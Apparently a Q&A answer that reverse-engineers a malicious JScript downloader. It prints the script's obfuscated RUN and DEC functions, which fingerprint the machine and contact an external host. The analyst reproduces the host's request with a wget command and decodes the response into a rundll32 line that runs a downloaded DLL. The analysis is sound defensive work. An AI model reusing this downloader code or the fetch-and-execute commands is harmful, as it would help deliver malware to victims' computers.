                "OBJ":
                  /* an object that wraps WScript.CreateObject and
                     provides a slightly obfuscated call-by-number
                     interface to create these types of objects:
                        1 = "MSXML2.XMLHTTP",
                        2 = "ADODB.Stream"
                        3 = "WScript.Network"
                        4 = "WScript.Shell"
                        5 = "Shell.Application"
                        6 = "Scripting.FileSystemObject" */
                "XOR": /* string XOR function */
                "PRE": /* function to hexify a string */
                "UNP": /* function to unhexify a string */
                "STR":
                  /* an object that wraps ADODB.Stream and provides
                     a call-by-number interface to some methods:
                       0 = write
                       1 = readAsText
                       2 = loadFile
                       3 = saveFile
                       4 = close */
                "REQ":
                  /* a function that does a GET request with
                     MSXML2.XMLHTTP and writes the result to a STR
                     (wrapped ADODB.Stream) object which is returned */
                "DEC": function(data){
                        var stream = new GLOBAL["UTILS"]["STR"];
                    var file = WSH.ScriptFullName;
                    var pos = parseInt(data.substr(0, 4), 16);
                    var len = data.charCodeAt(4);
                    var data;
                    var key;

                    stream[2](file);
                    key = stream[1](pos, len);
                    data = data.substr(5);

                    return GLOBAL["UTILS"]["XOR"](key, data);
                },
                "RUN": function(){

                        try{
                                GLOBAL["UTILS"]["TMP"]  =  GLOBAL["UTILS"]["PRE"]([ID, V, GLOBAL["UTILS"]["OBJ"][0](3).ComputerName.toUpperCase(), GLOBAL["UTILS"]["OBJ"][0](4).RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate")].join("|"));
                                GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["TMP"]].join("/?"));

                                if(GLOBAL["UTILS"]["TMP"] === false){
                                WSH.Quit();
                            }

                            GLOBAL["UTILS"]["TMP"] = GLOBAL["UTILS"]["DEC"](GLOBAL["UTILS"]["TMP"][1]());
                            GLOBAL["UTILS"]["VAR1"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[0]);
                            GLOBAL["UTILS"]["VAR2"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[1]);
                            GLOBAL["UTILS"]["VAR3"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[2]);
                            GLOBAL["UTILS"]["VAR6"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[3]);


                        GLOBAL["UTILS"]["VAR4"] = GLOBAL["UTILS"]["OBJ"][0](5).Namespace(35).Self.Path + GLOBAL["UTILS"]["VAR2"];
                        GLOBAL["UTILS"]["VAR2"] = GLOBAL["UTILS"]["VAR4"].substr(0, GLOBAL["UTILS"]["VAR4"].lastIndexOf("\\"));
                                GLOBAL["UTILS"]["VAR5"] =  GLOBAL["UTILS"]["OBJ"][0](6);

                        if(GLOBAL["UTILS"]["VAR5"].FolderExists(GLOBAL["UTILS"]["VAR2"]) != 0){
                                WSH.Quit();
                        }

                    GLOBAL["UTILS"]["VAR5"].CreateFolder(GLOBAL["UTILS"]["VAR2"]);

                    GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["VAR1"]].join("/?"));

                        if(GLOBAL["UTILS"]["TMP"]){
                                GLOBAL["UTILS"]["TMP"][3](GLOBAL["UTILS"]["VAR4"]);
                                eval(GLOBAL["UTILS"]["VAR6"])
                            }

                        }catch(e){}
                }
        };

        return GLOBAL;

})(this, "https://dmnhulie.xyz", "b917aff9c439c45d78ac214d91e75186", "0.2.4_js")["UTILS"]["RUN"]();
```

Matching up the arguments in the last line with the parameters in the first, we see that `HOST` is `https://dmnhulie.xyz`, `ID` is `b917aff9c439c45d78ac214d91e75186`, and `V` is `0.2.4_js`.

In the `RUN` method, this line:

```
GLOBAL["UTILS"]["TMP"]  =  GLOBAL["UTILS"]["PRE"]([ID, V, GLOBAL["UTILS"]["OBJ"][0](3).ComputerName.toUpperCase(), GLOBAL["UTILS"]["OBJ"][0](4).RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate")].join("|"));
```

creates an identifier that includes the `ID` and `V` constants, your computer's hostname, and an installtion date. Obviously they are using this to keep track of machines they have infected. My guess for the `ID` constant is that it represents a particular payload that they've been paid to install on infected machines. Or maybe it represents a specific spam run, or possibly even a specific spam recipient address. `V` certainly looks like it could be an identifier for the infection method - the Javascript itself.

The 4 components are joined with a `|` separator and the whole thing is hex-encoded. I put together a test string like this:

```
b917aff9c439c45d78ac214d91e75186|0.2.4_js|STUPIDVICTIM|1000000000
```

and hex-encoded it, producing this:

```
62393137616666396334333963343564373861633231346439316537353138367c302e322e345f6a737c53545550494456494354494d7c31303030303030303030
```

and simulated the next line:

```
GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["TMP"]].join("/?"));
```

by doing this:

```
wget -O trojan_payload 'https://dmnhulie.xyz/?62393137616666396334333963343564373861633231346439316537353138367c302e322e345f6a737c53545550494456494354494d7c31303030303030303030'
```

That gives back a small file which is needed for the next stage.

The next line:

```
GLOBAL["UTILS"]["TMP"] = GLOBAL["UTILS"]["DEC"](GLOBAL["UTILS"]["TMP"][1]());
```

Calls the readAsText `STR` method to convert the stream to a string and then passes the result to the `DEC` method.

`DEC` expects the string to contain a number (`pos`) formatted as a hex string in the first 4 bytes, a length (`len`) in the next byte (not formatted as text), and the rest is an encoded payload. I got different values of `pos` and `len` when I repeated the request. It seems to be randomized.

The script again reads its own source code to find an XOR decryption key, this time using `pos` and `len`. In one of my attempts, the first 5 bytes of `trojan_payload` were `15194`. That means the key starts at position 0x1519 = 5401 and is 52 bytes long (52 is the ASCII character code for the character `4` - the fact that the length byte is an ASCII digit is just a coincidence. It doesn't represent the number 4 here.)

The offset of 5401 bytes in the original script lands in the middle of the `code` string. Taking 52 bytes from that position you get `2|52|4|63|65|9|113|95|69|10|47|66|13|90|39|31|71|48|` as the XOR key to decrypt the remainder of `trojan_payload`. The result of that decryption is

```
31623562656161303330346165663264313735343633643862356531636265366566343562663862|5c57697a4d6f7573655c506167652d506167652e646c6c|3030303031383837|474c4f42414c5b275554494c53275d5b274f424a275d5b305d2834292e72756e282772756e646c6c33322020272b20474c4f42414c5b275554494c53275d5b2756415234275d202b20272c23312027202b20474c4f42414c5b275554494c53275d5b2756415233275d29
```

which is returned by the `DEC` method.

Note to anyone trying to recreate this result: when you cut and paste the original script from the question, you must save it with CRLF line endings to have everything land at the correct byte offset.

That gets split into 4 parts at the `|` separators and each part is de-hexified with `UNP`. The parts are:

```
1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b

\WizMouse\Page-Page.dll

00001887

GLOBAL['UTILS']['OBJ'][0](4).run('rundll32  '+ GLOBAL['UTILS']['VAR4'] + ',#1 ' + GLOBAL['UTILS']['VAR3'])
```

The first part is still a hex string because it was doubly hex-encoded. It becomes VAR1 which is used in the next `REQ` call, to request `https://dmnhulie.xyz/?1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b`

So I requested that URL and got a copy of the real payload: a DLL containing the string "Crypter.dll" which matches the one described here:

```
https://www.virustotal.com/en/file/b13e274e8c191671fe58127b3d9461df16e10acc3ff02e698119e1e8eabd924e/analysis/
```

You can't just go directly to the final download URL. The `1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b` token appears to be assigned for a single use only. When I tried to get it again, I got a 400 Bad Request error. You have to do the intermediate request, decode the small payload file with `pos` and `len` to get the 4-part response, and then you have a token you can use to download the real payload.

These results may not even be reproducible at all (although I did it 3 times and got the same DLL each time) because one of the major reasons for distributing a malware downloader is so you can cause different victims to download different payloads, or the same victim to download different payloads at different times.

I didn't analyze much after I got the DLL. The other 3 parts of the decoded `trojan_payload` appear to be a random filename where the DLL will be saved (VAR2 = `\WizMouse\Page-Page.dll`), a command line argument for the `rundll32` call (VAR3 = `00001887`), and another chunk of Javascript to call `rundll32`:

```
VAR6 =
GLOBAL['UTILS']['OBJ'][0](4).run('rundll32  '+ GLOBAL['UTILS']['VAR4'] + ',#1 ' + GLOBAL['UTILS']['VAR3'])
```

Comment: Wow, very complete answer, way more than I expected. Thank you a lot! As I said, I've reported the website I got this from and linked this question for details, as your answer is pretty great. Thanks again.